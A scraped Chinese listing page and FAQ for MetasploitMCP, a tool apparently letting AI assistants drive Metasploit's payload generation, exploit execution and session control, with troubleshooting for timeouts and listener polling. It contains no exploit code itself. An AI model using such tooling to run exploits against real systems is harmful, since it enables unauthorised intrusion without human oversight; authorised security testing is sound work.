从发现漏洞到生成报告周期长，因为需要手动截图、复制命令输出并整理文档。\n- 新手成员因不熟悉复杂的 Metasploit 指令体系，难以独立承担渗透测试任务。\n\n### 使用 MetasploitMCP 后\n- 分析师直接通过自然语言让 MetasploitMCP 搜索并列出适用模块，无需记忆繁琐命令语法。\n- 利用 AI 自动调用 `generate_payload` 和 `run_exploit` 接口，根据目标架构即时生成并执行定制化攻击。\n- MetasploitMCP 实时监控活动会话，支持一键发送指令或终止可疑连接，实现精细化管控。\n- 整个测试流程由 AI 辅助记录，自动汇总执行步骤与结果，大幅缩短报告撰写时间。\n- 初级人员通过对话式交互即可驱动专业工具，降低了渗透测试的操作门槛和学习曲线。\n\nMetasploitMCP 将复杂的命令行渗透工作流转化为直观的自然语言交互，显著提升了安全测试的效率与可访问性。","https:\u002F\u002Foss.gittoolsai.com\u002Fimages\u002FGH05TCREW_MetasploitMCP_b08f7fc8.png","GH05TCREW","Masic","https:\u002F\u002Foss.gittoolsai.com\u002Favatars\u002FGH05TCREW_149c0cae.jpg",null,"https:\u002F\u002Fgithub.com\u002FGH05TCREW",[81,85],{"name":82,"color":83,"percentage":84},"Python","#3572A5",98.3,{"name":86,"color":87,"percentage":88},"Makefile","#427819",1.7,563,163,"2026-04-02T07:26:39","Apache-2.0",4,"Linux, macOS, Windows","未说明",{"notes":97,"python":98,"dependencies":99},"必须预先安装 Metasploit Framework 并启动 msfrpcd 服务。该工具本身不依赖 GPU，主要用于渗透测试流程的自动化控制。支持 HTTP\u002FSSE 和 STDIO 两种传输模式。生成 Payload 时需配置保存目录环境变量。","3.10+",[100,101,102],"msfrpc-client (隐含)","pytest (测试用)","pytest-asyncio (测试用)",[15,45],"2026-03-27T02:49:30.150509","2026-04-06T05:16:56.743461",[107,112,117,122,127,131],{"id":108,"question_zh":109,"answer_zh":110,"source_url":111},14781,"遇到 SSE TypeError: missing 2 required positional arguments 'receive' and 'send' 错误怎么办？","这是 FastAPI 应用中处理 SSE 消息的路由设置不正确导致的。维护者已推送修复补丁解决了该问题。此外，现在可以通过添加 `--transport` 标志来选择传输模式：使用 `http`（默认）或 `stdio`（适用于 Claude Desktop）。请更新代码后重试，如果选择 stdio 模式，启动命令应包含 `--transport stdio`。","https:\u002F\u002Fgithub.com\u002FGH05TCREW\u002FMetasploitMCP\u002Fissues\u002F1",{"id":113,"question_zh":114,"answer_zh":115,"source_url":116},14782,"执行 run_exploit 时出现 'Request timed out' (MCP error -32001) 超时错误如何解决？","该问题在某些特定情况下会出现，通常是因为漏洞利用执行时间超过了默认的等待阈值。维护者表示已在代码中修复了此问题。如果遇到此错误，请确保拉取最新的代码版本。如果问题依旧，检查目标机器是否正常以及 Metasploit RPC 连接是否稳定。","https:\u002F\u002Fgithub.com\u002FGH05TCREW\u002FMetasploitMCP\u002Fissues\u002F11",{"id":118,"question_zh":119,"answer_zh":120,"source_url":121},14783,"start_listener 函数阻塞导致 Agent 等待超时，如何配置以支持长时漏洞利用？","默认情况下 `start_listener` 会等待 60 秒轮询新会话，这对于需要更长时间（如钓鱼攻击）的漏洞利用来说太短了。解决方案是将环境变量 `EXPLOIT_SESSION_POLL_TIMEOUT` 设置为 5 或更低，并配合使用 `list_active_sessions` 函数来主动检查是否有新会话建立，而不是依赖阻塞等待。","https:\u002F\u002Fgithub.com\u002FGH05TCREW\u002FMetasploitMCP\u002Fissues\u002F5",{"id":123,"question_zh":124,"answer_zh":125,"source_url":126},14784,"在 Cline 或其他客户端连接时遇到 HTTP 404 Not Found 错误怎么办？","这通常是由于服务器端路由配置错误或传输模式不匹配导致的。首先确保服务器已正确启动并监听指定端口（默认 8085）。检查客户端配置文件（如 Cline 配置），确保 `url` 指向正确的 SSE 端点（例如 `http:\u002F\u002F127.0.0.1:8085\u002Fsse`），且 `transportType` 设置为 `sse`。如果使用的是旧版本，请更新到最新版本以获取修复后的路由逻辑。","https:\u002F\u002Fgithub.com\u002FGH05TCREW\u002FMetasploitMCP\u002Fissues\u002F2",{"id":128,"question_zh":129,"answer_zh":130,"source_url":111},14785,"如何确认 Metasploit RPC 连接是否成功以及当前版本信息？","启动服务器时，日志会输出连接状态。成功的连接会显示类似信息：'Successfully connected to Metasploit RPC at 127.0.0.1:55553 (SSL: True), version: X.X.X'。如果看到 'Attempting to initialize...' 后没有成功消息或报错，请检查 Metasploit 服务是否已运行（使用 `msfrpcd`），以及用户名、密码和端口配置是否与 `MetasploitMCP.py` 启动参数一致。",{"id":132,"question_zh":133,"answer_zh":134,"source_url":111},14786,"项目支持哪些传输模式，如何在不同客户端间切换？","项目支持 `http` (SSE) 和 `stdio` 两种传输模式。默认模式为 `http`，适用于通过 HTTP 连接的客户端。对于像 Claude Desktop 这样需要标准输入输出的客户端，启动时需添加 `--transport stdio` 参数。例如：`python MetasploitMCP.py --transport stdio`。",[]]